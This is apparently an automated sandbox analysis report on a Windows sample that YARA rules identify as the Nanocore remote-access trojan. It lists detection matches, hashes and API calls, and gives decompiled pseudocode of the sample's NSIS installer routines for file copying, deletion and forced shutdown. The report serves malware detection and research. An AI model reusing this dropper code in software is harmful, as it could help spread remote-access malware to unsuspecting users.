              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
              Imagebase:0x400000
              File size:446374 bytes
              MD5 hash:8AE8A20159A1FDEDD8C4937E8CC4C571
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.327568976.000000000282E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Disassembly

              Code Analysis

              Reset < >

                Analysis Process: RHK098760045678009000.exe PID: 1744 Parent PID: 6048 RHK098760045678009000.exeCOMMON

                Executed Functions

                Function 004030FB, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x423fec; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x423f5c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\frontdesk\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\frontdesk\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x423f50; // 0x4e0f60
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														_t93 =  *0x423f50; // 0x4e0f60
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98("aufce Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                0x0040310c
                0x00403110
                0x00403118
                0x0040311c
                0x00403121
                0x00403131
                0x00403134
                0x0040313b
                0x00403142
                0x00403142
                0x0040313b
                0x00403144
                0x00403144
                0x0040325a
                0x0040325a
                0x0040325a
                0x0040325c
                0x0040325e
                0x00000000
                0x00000000
                0x004031f3
                0x004031f6
                0x004031fe
                0x004031fe
                0x00403201
                0x00403206
                0x00403208
                0x00403208
                0x00403209
                0x00403209
                0x0040320e
                0x00403211
                0x0040324a
                0x0040324f
                0x00403254
                0x00403257
                0x00403259
                0x00403259
                0x00403259
                0x00000000
                0x00403213
                0x00403213
                0x00403214
                0x00403217
                0x0040321f
                0x00403222
                0x00403224
                0x00403224
                0x00403224
                0x00403224
                0x00403222
                0x00403229
                0x0040322f
                0x00403237
                0x0040323a
                0x0040323c
                0x0040323c
                0x0040323c
                0x0040323c
                0x0040323a
                0x00403241
                0x00403248
                0x00403262
                0x00403265
                0x00403265
                0x0040326e
                0x00403273
                0x00403273
                0x0040327e
                0x00403284
                0x00403289
                0x0040328b
                0x004032b1
                0x004032b6
                0x004032c0
                0x004032c7
                0x004032cb
                0x00403332
                0x00403332
                0x00403337
                0x0040333d
                0x00403341
                0x00403456
                0x0040345c
                0x004034f9
                0x004034f9
                0x004034fe
                0x00403501
                0x00403503
                0x00403503
                0x0040350b
                0x0040350b
                0x0040346b
                0x00403474
                0x00403476
                0x0040347b
                0x0040347d
                0x0040347f
                0x00403481
                0x00403483
                0x00403485
                0x00403487
                0x00403497
                0x00403499
                0x0040349b
                0x004034a8
                0x004034b7
                0x004034bf
                0x004034c7
                0x004034c7
                0x0040349b
                0x00403487
                0x00403483
                0x004034cb
                0x004034d0
                0x004034d7
                0x004034e5
                0x004034e8
                0x004034ee
                0x004034f0
                0x00000000
                0x00000000
                0x00000000
                0x004034d9
                0x004034df
                0x004034e1
                0x004034e3
                0x004034f2
                0x004034f4
                0x00000000
                0x004034f4
                0x00000000
                0x004034e3
                0x004034d7
                0x00403350
                0x00403357
                0x00403357
                0x004032cd
                0x004032d3
                0x00403322
                0x00403322
                0x0040332e
                0x00000000
                0x0040332e
                0x004032dc
                0x004032e9
                0x004032e0
                0x004032e6
                0x00000000
                0x00000000
                0x004032e8
                0x004032e8
                0x004032e8
                0x004032ed
                0x004032ef
                0x004032f7
                0x00403368
                0x0040336a
                0x00403371
                0x00403379
                0x00403379
                0x00403384
                0x00403389
                0x00403398
                0x0040339c
                0x0040339d
                0x004033a6
                0x0040339f
                0x0040339f
                0x0040339f
                0x004033ac
                0x004033b2
                0x004033b8
                0x004033c0
                0x004033c0
                0x004033ce
                0x004033d5
                0x004033de
                0x004033e4
                0x004033e4
                0x004033f0
                0x004033f6
                0x00403400
                0x0040340a
                0x00403410
                0x00403412
                0x00403414
                0x00403415
                0x00403416
                0x0040341b
                0x00403427
                0x0040342d
                0x00403434
                0x00403437
                0x0040343d
                0x0040343d
                0x00403434
                0x00403412
                0x00403441
                0x00403447
                0x00403447
                0x00403447
                0x0040344a
                0x0040344b
                0x0040344c
                0x0040344c
                0x00000000
                0x00403398
                0x004032f9
                0x004032fb
                0x00403306
                0x00000000
                0x00000000
                0x0040330e
                0x00403319
                0x0040331e
                0x00000000
                0x0040331e
                0x00403293
                0x0040329f
                0x004032a4
                0x004032a9
                0x004032ab
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00403248
                0x00000000
                0x00000000
                0x00000000
                0x004031f8
                0x004031f8
                0x004031f8
                0x004031f9
                0x004031f9
                0x00000000
                0x004031f8
                0x00000000
                0x00403149
                0x0040314a
                0x00403156
                0x0040315c
                0x00000000
                0x0040315e
                0x00403160
                0x00403167
                0x0040316c
                0x00403171
                0x00403178
                0x0040317e
                0x00403194
                0x004031a4
                0x004031a9
                0x004031af
                0x004031b6
                0x004031c9
                0x004031ce
                0x004031d0
                0x004031d2
                0x004031d7
                0x004031d7
                0x004031e7
                0x004031ed
                0x00000000
                0x004031ed

                APIs
                • SetErrorMode.KERNELBASE ref: 00403121
                • GetVersion.KERNEL32 ref: 00403127
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                • OleInitialize.OLE32(00000000), ref: 00403178
                • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                • GetCommandLineA.KERNEL32(aufce Setup,NSIS Error), ref: 004031A9
                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,00000000), ref: 004031BC
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,00409168), ref: 004031E7
                • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 00403293
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040329F
                • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                • OleUninitialize.OLE32(00000020), ref: 00403337
                • ExitProcess.KERNEL32 ref: 00403357
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,00000000,00000020), ref: 0040336A
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00409148,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,00000000,00000020), ref: 00403379
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,00000000,00000020), ref: 00403384
                • lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,00000000,00000020), ref: 00403390
                • SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 004033AC
                • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                • CopyFileA.KERNEL32 ref: 0040340A
                • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                • ExitWindowsEx.USER32 ref: 004034E8
                • ExitProcess.KERNEL32 ref: 0040350B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\RHK098760045678009000.exe" $.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RHK098760045678009000.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$aufce Setup$~nsu
                • API String ID: 3469842172-2494378529
                • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                0x004054c8
                0x004054cc
                0x004054d5
                0x004054d8
                0x004054db
                0x004054e3
                0x004054e5
                0x004054e6
                0x00000000
                0x004054e6
                0x004054f5
                0x004054f5
                0x004054f8
                0x004054fb
                0x0040550f
                0x00405516
                0x0040551b
                0x0040551d
                0x0040552d
                0x0040551f
                0x00405525
                0x00405525
                0x00405532
                0x00405535
                0x00405540
                0x00405546
                0x0040554b
                0x0040555b
                0x0040555d
                0x00405563
                0x00405566
                0x00405569
                0x00405626
                0x00405626
                0x0040562a
                0x0040562c
                0x0040562c
                0x0040562c
                0x0040562c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040556f
                0x0040556f
                0x00405578
                0x0040557e
                0x00405583
                0x00405586
                0x00405588
                0x0040558c
                0x0040558e
                0x0040558e
                0x0040558c
                0x00405591
                0x00405594
                0x004055a7
                0x004055a9
                0x004055ae
                0x004055b5
                0x004055cd
                0x004055d3
                0x004055d9
                0x004055db
                0x00405600
                0x004055dd
                0x004055dd
                0x004055e1
                0x004055f5
                0x004055e3
                0x004055e6
                0x004055ee
                0x004055ee
                0x004055e1
                0x004055b7
                0x004055bd
                0x004055bf
                0x004055c5
                0x004055c5
                0x004055bf
                0x00000000
                0x004055b5
                0x00405596
                0x00405599
                0x0040559b
                0x00000000
                0x00000000
                0x0040559d
                0x0040559f
                0x00000000
                0x00000000
                0x004055a1
                0x004055a5
                0x00000000
                0x00000000
                0x00000000
                0x00405605
                0x0040560f
                0x00405615
                0x00405615
                0x00405620
                0x00000000
                0x00405620
                0x00405537
                0x0040553e
                0x00000000
                0x00000000
                0x00000000
                0x004054fd
                0x004054fd
                0x004054ff
                0x00405630
                0x00405633
                0x00405636
                0x00405688
                0x00405688
                0x00405688
                0x00405638
                0x0040563b
                0x00405646
                0x0040564b
                0x0040564d
                0x00000000
                0x00000000
                0x00405650
                0x00405656
                0x0040565c
                0x00405662
                0x00405664
                0x00000000
                0x00405680
                0x00405666
                0x0040566a
                0x00000000
                0x00000000
                0x0040566f
                0x00000000
                0x00405676
                0x0040563d
                0x0040563d
                0x00000000
                0x0040563d
                0x00405505
                0x00405509
                0x00000000
                0x00000000
                0x00000000
                0x00405509

                APIs
                • DeleteFileA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 004054DB
                • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405525
                • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405546
                • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040554C
                • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040555D
                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                • FindClose.KERNEL32(?), ref: 00405620
                Strings
                • "C:\Users\user\Desktop\RHK098760045678009000.exe" , xrefs: 004054BD
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004054C7
                • \*.*, xrefs: 0040551F
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
